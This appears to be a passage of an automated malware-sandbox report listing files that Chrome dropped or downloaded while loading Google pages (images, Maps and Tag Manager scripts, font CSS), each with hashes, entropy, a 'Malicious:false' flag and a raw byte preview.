                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2...dIDATx..}|\e....y.[...RZ.....v..*.LZZ(.(..E].>..,.Q.QW..UVE.(..o...... -....@S@V@.....M3.$m.:.......I2..s....6w.s........<0..SL^$.....=+.....3U.I.].:...........j..u.S...5zQ....!s......w.I+p:.x....@E..e.*....L ....LE..P(.sv..3..:.0....*.....{.y.a#..*..pp.6.&..z.E.T[z.._...3.pn......#..-..C./.....1....^."/cZ?.]`5y.]....N7.:.........wA{..:T}h..S..Nh.&.(r....L..r...4&.)I...2..:...5.,.f..#`...MQ..W.....^D.6...6..W.....X....kT.:..|u..i....R~..q{.pD.W....".x."...8.x....7.V.....Ru.>"....<...L...."...N...nK...u@m....d.f|.i0Co..&.%...VV...}.&p.!.a.o...a4.G(k.......T.@..Do..]=.D7A.~;L..?.W...k...3.H...;1.....k..%.x_(..e...Y*...:.s%-...nG.kW5b...S......]7..xI.....t..............zS/..}..=..E1"..V.........w..>...0..-.{......jf..1r..VG......[]...(... .}.tT..~...R...;;...n.ST..r?H.9/L....zM1....j.6...7.>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17689
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1713605102899516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YebzDKW6zOqwN9vAwtZALfLuVj8PVyswrkTusyJgwc9DjoudkM/z7MGGWhbP9tm+:tlobuMML9Omcp
                                                                                                                                                                                                                                                                                          MD5:53B618EA4BCB5890F59C7FB47B16CB9B
                                                                                                                                                                                                                                                                                          SHA1:C030C8A38FD6E19D00F9DF721B30689117E7E157
                                                                                                                                                                                                                                                                                          SHA-256:B0D519B3ED3EB1A54376FA3920801E3743BBF0615973F39DE0C41EAEC65AF474
                                                                                                                                                                                                                                                                                          SHA-512:6602FEAEA485C761B13C9F5FC8A28E342758305854941D29251F4536825F83822196470FD051DDB161E3FF7C57C8C8431A62B7EB13F3D74D7D38B355ED823C61
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"chunkTypes":"1000011111110011110001000010110100000011111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111110111101111111113101101111111111110111111111111110111111111111111100011010111111111111111111111111111110101002222121212121212121212121212121222222212121212121212121212121212121212121212222221222212212221221221221221221221221221221221221221221221221221221221221221221221221221221221222122122122122122122121212122121212121212121212121212121212112121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212222212121222222222122212121212211221212121212112121121212121212121212121212121212121221221221
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4632)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):31006
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.548029155315869
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:qJhfJmZTlv2TmXEJ24mk/B4UnbjLeYX8iHMfBcv5mc5ajNeB1o0oAWYOxIFTWwrq:8BbvXQrNeG8y
                                                                                                                                                                                                                                                                                          MD5:B3E361BAAD69070C65C4394FC804D91A
                                                                                                                                                                                                                                                                                          SHA1:FD42AAFB6463713F2BE75A5B73F08DDDF4DF6CB4
                                                                                                                                                                                                                                                                                          SHA-256:D8427421CEE0B7A9768B360DA1C8F81E6F49E5561AC44884B627C8070156C3E3
                                                                                                                                                                                                                                                                                          SHA-512:0BD3D87BE1C52431A8B374D059364F8568ECA7343AC0CE2222B64DEF544D97731B86C8B3A49DC44E2EDFF0234A3C9CD91E1801B8CFCB9B0C88BC96E7D6E40679
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/onion.js
                                                                                                                                                                                                                                                                                          Preview:google.maps.__gjsload__('onion', function(_){var gZa,hZa,iZa,WP,ZP,YP,lZa,mZa,nZa,kZa,oZa,aQ,pZa,qZa,rZa,uZa,wZa,xZa,zZa,AZa,DZa,FZa,HZa,KZa,GZa,IZa,MZa,JZa,NZa,fQ,gQ,eQ,hQ,SZa,TZa,iQ,UZa,VZa,jQ,WZa,XZa,kQ,c_a,b_a,nQ,h_a,i_a,j_a,g_a,k_a,m_a,pQ,q_a,r_a,s_a,l_a,n_a,o_a,t_a,u_a,oQ,D_a,E_a,H_a,G_a;gZa=function(a){a=_.kJa(a);if(!a)return null;var b=new VP;b=_.Yd(b,1,_.qD(String(_.Ec(_.Xg(a.Fg))),0));a=_.Yd(b,2,_.qD(String(_.Ec(_.Xg(a.Eg))),0));b=new eZa;a=_.qe(b,VP,1,a);return _.Kb(fZa(a),4)};hZa=function(a,b){_.Bg(a.Gg,1,b)};.iZa=function(a,b){_.Bg(a.Gg,2,b)};WP=function(){jZa||(jZa=[_.N,_.M,_.O])};ZP=function(a){_.LG.call(this,a,XP);YP(a)};YP=function(a){_.cG(a,XP)||(_.bG(a,XP,{entity:0,Ym:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],kZa()),_.cG(a,"t-ZGhYQtxECIs")||_.bG(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};lZa=func
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):946
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.529486934378591
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:JY8iFVgVv882fuxBkvGt00NGNfkAclNGNGN45vd:JniFUE822jknh
                                                                                                                                                                                                                                                                                          MD5:BEAD483AEFEFECC7F57C8B07C9810B62
                                                                                                                                                                                                                                                                                          SHA1:6DA79643CFA4053E4359F1087684EF283CB0FD2E
                                                                                                                                                                                                                                                                                          SHA-256:4CAD8F94AF9C3253C5B4C92F1D36ECDB0D01DACC655250773A1428B0A80D0031
                                                                                                                                                                                                                                                                                          SHA-512:C97C6E8F5159523897E846B0D0D684FF0EBEA00AECF96A16DF5EE5EBB3BD78FE1146A763746F0A482D1DE827B3C46ABF5C742A5B474C0F256AF8630216B16067
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....iIDATx...=..Q....3k%..V..DB...M.%..hP........A.L)A'....D.]..3s.6..5.~...K.....3...y.....k.. u9....E?Wv....<bss.w.../....l..5`W.s.k...[^3.....E...n...O.N...4......3+.n...%&@..a....t....Y...R.9`{.....t.u...T.....3k2I.W.2.K.d)"......}.G!..u.MS.yV.........W....yT.x9p>U.^..Wu....W....1.Y..8N.....*.x9p............).x9p.Z_...}..^.\Fk.........e./^.\^.....I..A.c.....#..=P.j`.._.IL.....c..o..j..5..:.bR.....`q.,..9.8......X...s`q.,......~..d2V...........O2...0..........K.".{T...`q.,..9..z.....na......._.....G....Yx{.....0y...+}.E.F.0N]..~.5L-.2.....X...s`q.,..9.8......X...s`q.,..9.8.....F.#;..P.g..},}.%...{/..K.b$.-Z...s`q.,...E..w...G...3..g.D..,Sw.;,.2...!....M.y../...+.....X...s`q.,..9.8......X...s`q.,..9.8......X...s`q.,..9.8.....v......#._......{`.mMR.......7...=4..|.....a@....C.7..$..x.1_.C.lm..<bx...R.9..0...[..f....bffff........C....IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5735
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.955505548921549
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:V7eB4KzeJzODxJg6mrNPyw6KIBcSoV3OES1pdp36WGo3n6jyWfuuwnyWFerwp:BDtDlNaEIq2ES1fVbXYyW6nvFtp
                                                                                                                                                                                                                                                                                          MD5:B1C26FE54C881726FDF004CE63A82CBC
                                                                                                                                                                                                                                                                                          SHA1:07582EF29872723F7EB6E41586D63F0493E7CE14
                                                                                                                                                                                                                                                                                          SHA-256:FE87FFBC5906C5E3DA65AC206D3E55B9F96463FAEBA81F1A690D79517F7747D0
                                                                                                                                                                                                                                                                                          SHA-512:373653283A62C3C522EDA51F53B06B77095944A9438C3FD64D08F1C5B4DFF0C7C83C0C5D4FEAE3E89A12CE607D52B5FEE1DCD487AE70185C0D2D1D527440F65A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{.\W}.?.s.3....~..8....yP...B).T..R%...P.....(j)"..%BTH@..D...`'.1...........v..;s..{...wf_..w..F.{..{...;..;.s..h..&.h..&.h..&.h..&.h..&.hba!s.8s.L.1.7.1.k..1.X.._.F.c.t..C...@).P.Fe..".P.r..`...{7o.<9..].^....R...ee..~.a..k..[k}..H...C......C...Y...H.EV%./.l.K.\.x.K....C..Y..K}./GTMp..E..... ...RF..e...^.d......F).hG....&..y...d...e-.gR.../...d2X..B.EO.ax".u.N...0..m_.\...2.H,)+W,.h......6......G.G....]ccc.(.9..~.u]Y*$/..s&..]]]_...=/.....=.<1::....p".....8..uc..:.Rg\....M.Ltvv.;.s...\.>..D...._..8.8.3....b..lYV...|.K.R....7Dd.R..WD........K...f...........Ga.^...Q-..FT.......B...s..s..Q-..:L.T..L&.....{..7.R)G)U*....e...T`Gk......Pe2....'..|.u..a.Q.A...X......Z.PD.a......(.j...M.(.Dk.Zk}..z."%.$....GN.V.A...!.Z...C..P.%Gp.K../.,.'k!.T.....o..^FX.Y..A{a....eI.r.^X../',;.....2$x.aY.............L.^&.6~.....7=..D{...K...x...$7.../...Cl..s.V..i.~...c..~.`i.,.J!.FG.....(:..x.&..a.Z.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):298298
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.574167286483073
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:b4uypmFU79li04d7z3KsOemvelN+H0fxnQe:subW794nhDRh
                                                                                                                                                                                                                                                                                          MD5:5A9F4D171D21833CC909C8F94DAD91E7
                                                                                                                                                                                                                                                                                          SHA1:DF8A17EECF107BB1010313DFBB955A8753F64026
                                                                                                                                                                                                                                                                                          SHA-256:48A686039F23223E68BEB9DEE15A8311C5C39EF0200758CB41DC63274CAD0B54
                                                                                                                                                                                                                                                                                          SHA-512:19C83CBDD12144A8D6D8FC9B5A0A91FE0F4D8386F1378CB4DE71930642B0587C8337419B741B83F87D019AF67EA22A1C05CA22B4475FB5B98D68181349FB8E97
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":20,"vtp_rules":["list","^www\\.google\\.com$","^www\\.b197145817google\\.com$"],"tag_id":105},{"function":"__ogt_referral_exclusion","priority":10,"vtp_includeConditions":["list","^www\\.b197145817google\\.com$"],"tag_id":107},{"function":"__ogt_dma","priority":10,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":108},{"function":"__ogt_1p_data_v2","priority":10,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 426968
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):66133
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995810192347393
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:zuNIcdaEBLhVFLl5SNmAcAl8WFM5IDw7OB3w3JNJy4LVIySaXsB:zuGcUEB3tl5S1fU7GEDc45RSa8B
                                                                                                                                                                                                                                                                                          MD5:EFA8BAC2B2A9B1BDFDBF6F83C85984B3
                                                                                                                                                                                                                                                                                          SHA1:E0753AB74045F6BC53C0C022B1F6B69676F00658
                                                                                                                                                                                                                                                                                          SHA-256:DB1E32E997594D01E721DE13B1FD03A9A01B478ACE1974461DC36DF240B2FE47
                                                                                                                                                                                                                                                                                          SHA-512:8D8140D925FB5712F5F4F6E2B40F127FE2ED893C6AF1129ADF002AB1856D765F152DBEF5A0D49919AE1D99AC7D1B306DC64F45575FDFAD9CF8E9CACA23848840
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://sustainability.google/static/index.min.css?cache=732a3af
                                                                                                                                                                                                                                                                                          Preview:...........n#.(.+<.0.}.I..j.6.w.g...=...A.D..r.!.T?F./.G./._r#"#..]Y.....<#VeEFF.+###OnW.U..?....^....bU..w...rz.ql....]U......j..........>.....oW....C.<.a..'v?.....K.p..P.[C....U....C.`.......bU.......w.G..\..9=0..6K...........P.........C}..l...{.......#...T....zj.\..*..zj.<l..f....v.i^. .-.`s..._.s.......|..T...Z...u.).]L&.._=.>^/....0...b_.n._..E..../.d^?..6..z.S...,n`..~........vW~......Cu..>.......jyU.....X..MU..ws5.....G..y!..)r..j....Y.....}......W..e........R.".`~...F_])...c..C../.P....fN.T.]ow.j.B8.......u.r2..^]...\...9...!h.!r.i.W.*?..W..fD.%v........"...8.7.^}...v{..F.-7..ow0...U...J.x...}..o..3.?U..Z.....:.L.X..!..([..n..Y^....E...N.a.4P.p'.W.rw[o.@......qz..{...m...V....~j=&.\........\..'..,..v...8cS.f;.F0d.~{...0.?U..u....4[.v@......oi.0..v7:...._2.....r.S.....Pl.6.v..N.....8B.G-...aUnn..........\....%..........#>...g..m.~.....x...Ow..u...:]........]}.v...].%C]z...D.W....t.......v...J*....S.....L^..M..&......>...|...>|
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4175
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.792037496841981
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:CNjUwmdPbBhCwrndwU/FVNk3twv+EEXFx9y8TFk:884wT1bi39EuVymk
                                                                                                                                                                                                                                                                                          MD5:528CFAAE326A3BB9E2AC8FA84F86B629
                                                                                                                                                                                                                                                                                          SHA1:2896806E67CA814B3A1CDCB3269570AE59CD63F5
                                                                                                                                                                                                                                                                                          SHA-256:208D04BF349F845F35F37B1F14EA345663C3A538408CF593CCC57D0AA8746565
                                                                                                                                                                                                                                                                                          SHA-512:81DC39DF65F3455A96356621DCED76F92253F13AF90A4048D154FA24BE322D6B8DD4B98A75A2840EF802577418F09A029A1D770EF4D2F61AF3DE902C9EFDB9F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/UqqZocZvjGksiGtlRkKb5NsuhpQkMLt3A85lMQ81Pms9tSZ3lLpymbAeinPIe5qUJRdmOKqL9InBBVsh6_gK-1QcNGppeUa7owoKgqo=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:fad22fce-9b5e-40af-8da4-79ebc9d7b747" xmpMM:DocumentID="xmp.did:77C7253ABDC411E7AA94B0991AE57A61" xmpMM:InstanceID="xmp.iid:647C83D0BDBA11E7AA94B0991AE57A61" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2b506a1b-0412-4705-a778-18e227438701" stRef:documentID="adobe:docid:photoshop:db2f6a03-054e-117b-b783-bbf95c42df91"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>`H....._IDATx..[{pT.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9615
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972142301683551
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YL/9PM2qd6x980bBOeZjkxZBxZqPfe9hhUWWcgKJO69ucstA5HyyWU:YD9PM2d980oDZrA2a5KJDscs8Hd3
                                                                                                                                                                                                                                                                                          MD5:CEE10F64B70B2F7DCDFD728D4FC54C89
                                                                                                                                                                                                                                                                                          SHA1:3ED572063F27C9A8B3274F9B6815B4267A8F32CF
                                                                                                                                                                                                                                                                                          SHA-256:B995946A022C670242313955BA02D1A4B7B2CA3DB1820DDD731B706CE9D5DB3D
                                                                                                                                                                                                                                                                                          SHA-512:745CEA658651D60C099DA3C3086D0A63ED3160BC53902977069A1F79F27C6D7A5300716F7035567128AA151B926C780753DF74EF5D1A46BA8BA8644854D7641A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y..U....V....;..@B.B".....u..w.Aq..DG.F_.qCGPG@qF|U.A.....A.a..}...@B....=kU...Q.,..t.;..&.....n-....s.}.(..(..(..(..(.b,0.>..M.r..1.......l.w3.\.x.TWe........o.m@..g.x...>...5.K.w."(.....>..........`..`....sV~j..5)x..l..DT..!y{C....}j.e.LLa.&.ox..mO~].Y^.!..c.>.....d..M.....,8...)v0.s..O.;...L....{.i0+..\(`...e.....M........3........x...xn.?..d3'=..5S].B.W.......%.>.l..UW.U..Q.i.&.7...<.r ..h..I.F.mR7.g....=.g...H.T?.x.uI.......]...~..l..@Z...[_.\.r)p.`...>H...F..-.N."q......{^.U.Z..7{.....*W..N.3..^7..0F.......g....>.[w..zuK.L.d.@...>....1C.7&8G....*.W./8>mj....n..[...y.g....@....?.....B.U+..R..e..........dB.E..H.K..M.Q%..H...g!Z..M..k7..].).".:......o.1..%.o.sQ...W.w.Nv~.:..Q.[AYE2.\.......`G..zL.....8q.#........Br}H...n./.*.*...5.%.....4..X|P%....u....l..q..I..Ip...X..;.Mo....s...D.B.P..$&V....a.....EWVb...x...........U6.d.H...D.t"..au.....t.U...%..<.......4Uu...7..?...&....#..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):30889
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.570225718316411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:id4/FGwUi038enbUEyOhmbqGIwBjh4ZYDyPHe//mlX7ib3DdA07EhNymbqGIwSc2:Vz+6qd4Xi5qiddnqa83X54goK
                                                                                                                                                                                                                                                                                          MD5:2C1CD6F0FA5FAF54D9D04FC5CF05CE14
                                                                                                                                                                                                                                                                                          SHA1:22F82444500A7AA34611BF22B54B808E1D9A0940
                                                                                                                                                                                                                                                                                          SHA-256:C1CA063A6A38D0E1785940F6BB2C608CF4B4D8C70BC6E2D8CA3B30AFF0A8A500
                                                                                                                                                                                                                                                                                          SHA-512:243B7F04D0F349402B361FE409111951D2284F6E81D92A40E510A681B6B7E9B7B1F7E03257C07B99816EDC53CC5838D5907FF69F9B58777B641460CE27707FFC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Google+Sans+Text:400,500,700|Google+Sans:400,500|Google+Sans+Display:400,500,700|&lang=en&display=swap"
                                                                                                                                                                                                                                                                                          Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.g
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):289026
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8634802342545584
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:z5wIG8iYLWM++Mr72ESBVL4YFAuDmFXlzOeVyoZ:z5wIG8hLJFizmq+A91ae0C
                                                                                                                                                                                                                                                                                          MD5:8456A6083B876E455A033455E43B8075
                                                                                                                                                                                                                                                                                          SHA1:BD2B7F39671C80C4AF8CBBD21397714F5745E245
                                                                                                                                                                                                                                                                                          SHA-256:C51DC73B33292EEB510DD9B03A5518566FC67F97C07FCEB8F344EEFDD894CE25
                                                                                                                                                                                                                                                                                          SHA-512:54683238FC4EAD3D4A42D61FB122AC166F74E3E7D355F5653546BC769A7BC8C8A02A85D86F76722A56558E5F979FED406E30182370B9A0814782DCBF0153E827
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/GhfIwA6ZINFkFgE77BVZ596ZtFXFc72Z6OfHGeHh4VO8ZSNBZkXXcRdgWvhzJKDzmy22DROUcJKCaZbeDHpT7raQ-ZKBmj1MM1JqGQ=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF.h..WEBPVP8L.h../..D..u!...b...(.z.;..1.VVY..*.........m.......U.X...V.P+J,))8v:.8T...;j..v..4.e.=.YNG..d..a{.2+.......{..q.,..ig.&;.u.'......=.....8.`...@,..P.|.W.[?.......D..=..y.}....'...{...9..=r..b..b..1v...L.v2z.3..+.r..:.I....gs...u.H.....D.....h.V..m.]y..;..i..3...v.gVY..3..{..ne9.M.&...0..zbX@..x......m...m..~^8=.8.P.f.B%.4...&=.p.&..."......K.V..;....8Hw.p....%..v..vF[K..T[M..p.P........i..F...O.h.1..x... S...V....I.P.wn...>r..m....}i..wB..L..:.XK...m...`.L.=..........0.)..z. .m......O..m$i;nP.!...X.E.C.=.<.j..Mh=..nb.....<......2..A.T.9.ml...}..b.(.m...m...."...A.\s..$.j,I| .^......m.......8..$i...i.d...5..Mz...P.H....8.................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25564
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.401392014306985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:mWBk8bQC4itKR5YKEFMVF/rrxT6MB0WY+cdPLfeO54sGnhNhmMNKRitLVfiM3vrD:Qit2Jxk6h23krn
                                                                                                                                                                                                                                                                                          MD5:BA71595D1621DC8F04524135BF1700F6
                                                                                                                                                                                                                                                                                          SHA1:9AF3DC177C84F3ECE52A881228C419C3F1B2C48F
                                                                                                                                                                                                                                                                                          SHA-256:F43A5A76D17FBDBEC6371456B4C93B1078FD0B36EE3FE28AFD1E55ADB0B07771
                                                                                                                                                                                                                                                                                          SHA-512:8653F4117D9ECFAC01F36F5C3CD5A1750BD006F27A0065C2F998E88871B51136591F0761F491CC6A3D5D73B80EF2EF7374A14135EB1DFB4F682D1ABD68AAC9A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{._.D3c=_.B("P10Owf",[_.lq]);.}catch(e){_._DumpException(e)}.try{._.x("P10Owf");.var E3c=function(a){_.C.call(this,a.Ka);this.oa=this.getData("cmep").Jb();this.Wb=a.service.Wb;this.data=a.Jf.uQa};_.F(E3c,_.C);E3c.Ha=function(){return{service:{Wb:_.lt},Jf:{uQa:_.tv}}};E3c.prototype.Ca=function(){this.Wb.oa().Aa(this.getRoot().el(),1).log(!0)};E3c.prototype.Ba=function(a){var b;a.data?b=_.Tb(_.tv,a.data):b=new _.tv;F3c(this,b)};E3c.prototype.Aa=function(a){F3c(this,a.data)};.var F3c=function(a,b){var c;(b==null?0:b.XF())&&((c=a.data)==null?0:c.XF())&&(b==null?void 0:b.XF())!==a.data.XF()||a.Wb.oa().Aa(a.getRoot().el(),2).log(!0)};E3c.prototype.Fa=function(a){this.Wb.oa().oa(a.kb.el()).log(!0);_.jf(document,_.nTb)};E3c.prototype.Da=function(a){this.Wb.oa().oa(a.kb.el()).log(!0);if(this.oa){var b;_.jf(document,_.mTb,(b=this.data)==null?void 0:b.serialize())}else _.jf(document,_.lTb,this.data)};_.L(E3c.prototype,"kEOk4d",function(){return
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                                                          Malicious:false
